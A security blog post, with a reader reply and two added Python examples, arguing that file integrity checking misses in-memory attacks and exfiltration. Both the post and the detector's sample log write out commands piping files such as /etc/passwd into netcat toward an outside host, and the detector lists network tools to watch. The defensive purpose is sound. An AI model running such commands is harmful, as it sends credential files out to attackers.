OpenSourceSoftware, Security

Why file integrity checking is not enough…

I was talking with two prominent security professionals today, and the topic of integrity checking came up. It gave me some food for afterthought…

(For more info on integrity checking, see: http://en.wikipedia.org/wiki/Samhain_(software), http://en.wikipedia.org/wiki/Open_Source_Tripwire or http://www.ossec.net/main/about/ )

If you run full integrity checking on all your file systems, you will have good knowledge of which changes are made to your system: changed files, new files, deleted files and so on. But for common use, seeing every temporary file written to disk (say a PHP session file), every file created or changed when someone logs in, or log files that constantly get new content and hash differently every time you md5/sha1 them, is usually just too much noise… or, if you have the time to review it all, good for you.

That's why most file integrity checkers are “tuned” by default to ignore *something*. So there will be places on the file system where files can be hidden from integrity checkers.
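To make the blind spot concrete, here is a small baseline-and-compare integrity checker. It is an added example, not code from the post or from Samhain, Tripwire or OSSEC. It hashes every regular file under a root, skips paths matching a glob exclusion list (the "tuned" defaults), and then diffs two baselines. The scenario in `demo()` is constructed in a temporary directory: a modified "binary" is reported, a file dropped into the excluded `tmp/` directory is not, and merely reading a file produces no change at all.

```python
import fnmatch
import hashlib
import os
import tempfile


def file_digest(path, algo="sha256"):
    """Hash a file's contents in chunks so large files are not loaded whole."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, excludes=()):
    """Record (digest, size, mode) for every regular file under root.

    Relative paths matching any glob in `excludes` are skipped, the same
    way a tuned checker skips /tmp, session directories or live log files.
    """
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if any(fnmatch.fnmatch(rel, pat) for pat in excludes):
                continue  # the exclusion list is where the blind spot comes from
            if not os.path.isfile(full) or os.path.islink(full):
                continue
            st = os.stat(full)
            baseline[rel] = (file_digest(full), st.st_size, st.st_mode)
    return baseline


def compare(old, new):
    """Diff two baselines into sorted added / removed / changed path lists."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = sorted(p for p in set(old) & set(new) if old[p] != new[p])
    return {"added": added, "removed": removed, "changed": changed}


def demo(excludes=("tmp/*",)):
    """Constructed scenario: a fake root with a 'binary', a config and a tmp dir.

    The default exclusion mirrors the post's point; call demo(excludes=())
    to see what a checker with no exclusions would have reported.
    """
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        os.makedirs(os.path.join(root, "tmp"))
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"#!/bin/sh\nexec /bin/ls \"$@\"\n")
        with open(os.path.join(root, "etc_passwd"), "wb") as f:
            f.write(b"root:x:0:0::/root:/bin/sh\n")
        before = build_baseline(root, excludes)

        # 1) Modify the 'binary': reported as changed (hash and size differ).
        with open(os.path.join(root, "bin", "ls"), "ab") as f:
            f.write(b"# trailing bytes appended\n")
        # 2) Drop a new file into the excluded directory: silently ignored.
        with open(os.path.join(root, "tmp", "dropped.txt"), "wb") as f:
            f.write(b"lives in the blind spot\n")
        # 3) Only read a file, as `cat somefile` would: no change recorded.
        with open(os.path.join(root, "etc_passwd"), "rb") as f:
            f.read()

        after = build_baseline(root, excludes)
        return compare(before, after)


if __name__ == "__main__":
    print("with default exclusions:", demo())
    print("with no exclusions:     ", demo(excludes=()))
```

The baseline deliberately does not record access time, so step 3 is invisible by design rather than by oversight: a read-only action simply is not something a file integrity checker measures.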

My point in all this is that a file integrity checker alone does not really give you any real insight into *bad things on your machine*. Why? Something might live only in memory… Take my last blog post as an example. It gives a shell on the system but leaves no new or changed files, except for the Apache log file 🙂 But every HTTP request changes that file too, so running file integrity checking on the live log would not make much sense.

Say someone got a cmd/shell on your machine. Running `cat somefile` would not by default trigger any normal integrity checker. Then doing `cat somefile | nc evil-storage-machine.ru 80` would go just as unnoticed by a file integrity checker.

So you need something more…


2 thoughts on “Why file integrity checking is not enough…”

  1. Hey,

    That’s why integrity checking alone is not enough. The goal of it is to identify that “trusted” parts of the system are still intact, like configuration files, binaries, etc. It might not be enough to detect all attacks, but some of them will be (including mis-configuration by admins, etc).

    So, to complement integrity check, you should do log analysis, system auditing (configuration hardening) and look for issues in your /tmp, rootkits, etc. As far as OSSEC goes, it does it all by default 🙂

    Thanks,

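The reply above recommends complementing integrity checking with log analysis. As an added example (not OSSEC's rule engine and not the post's code), here is a small detector run over a constructed process and socket event stream. The event format is hypothetical: one JSON object per line, either an `exec` record (pid, ppid, user, argv) or a `connect` record (pid, destination), the kind of data auditd or an EDR agent can produce once converted. The sample reproduces the post's scenario, a shell under the web server account piping a file into a network tool, alongside a benign admin SSH session; no file changes are involved, so this is exactly what the integrity checker cannot see. The destination `203.0.113.10` is a documentation-range address standing in for an external host.

```python
import ipaddress
import json

# Constructed sample events (hypothetical format, one JSON object per line).
SAMPLE_EVENTS = """\
{"type":"exec","pid":4001,"ppid":1,"user":"www-data","argv":["/usr/sbin/apache2","-k","start"]}
{"type":"exec","pid":4012,"ppid":4001,"user":"www-data","argv":["/bin/sh","-c","cat /etc/passwd | nc 203.0.113.10 80"]}
{"type":"exec","pid":4013,"ppid":4012,"user":"www-data","argv":["cat","/etc/passwd"]}
{"type":"exec","pid":4014,"ppid":4012,"user":"www-data","argv":["nc","203.0.113.10","80"]}
{"type":"connect","pid":4014,"user":"www-data","daddr":"203.0.113.10","dport":80}
{"type":"exec","pid":5100,"ppid":5000,"user":"alice","argv":["ssh","10.0.0.5"]}
{"type":"connect","pid":5100,"user":"alice","daddr":"10.0.0.5","dport":22}
"""

SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "http"}  # accounts that should never run a shell
NET_TOOLS = {"nc", "ncat", "netcat", "socat"}               # raw network clients worth watching
SHELLS = {"sh", "bash", "dash", "zsh"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def basename(path):
    return path.rsplit("/", 1)[-1]


def is_internal(addr):
    """True for loopback, link-local and RFC 1918 destinations; everything else is 'outbound'."""
    ip = ipaddress.ip_address(addr)
    return ip.is_loopback or ip.is_link_local or any(ip in net for net in INTERNAL_NETS)


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def analyze(events):
    """Apply two simple rules and return a list of findings in event order."""
    procs = {e["pid"]: e for e in events if e["type"] == "exec"}
    findings = []

    # Rule 1: a service account spawned a shell (process tree says who started it).
    for e in procs.values():
        if e["user"] in SERVICE_ACCOUNTS and basename(e["argv"][0]) in SHELLS:
            parent = procs.get(e["ppid"])
            findings.append({
                "rule": "shell-under-service-account",
                "pid": e["pid"],
                "user": e["user"],
                "parent": basename(parent["argv"][0]) if parent else None,
            })

    # Rule 2: a raw network tool connected to a non-internal address.
    for e in events:
        if e["type"] != "connect":
            continue
        proc = procs.get(e["pid"])
        if proc and basename(proc["argv"][0]) in NET_TOOLS and not is_internal(e["daddr"]):
            findings.append({
                "rule": "nettool-outbound",
                "pid": e["pid"],
                "user": e["user"],
                "dest": f'{e["daddr"]}:{e["dport"]}',
            })
    return findings


if __name__ == "__main__":
    for finding in analyze(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

Both rules key on process lineage and socket activity rather than on file content, which is the complementary signal the reply calls for; the admin's `ssh` to an internal host matches neither rule, so the output is the two events from the web server's shell only.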
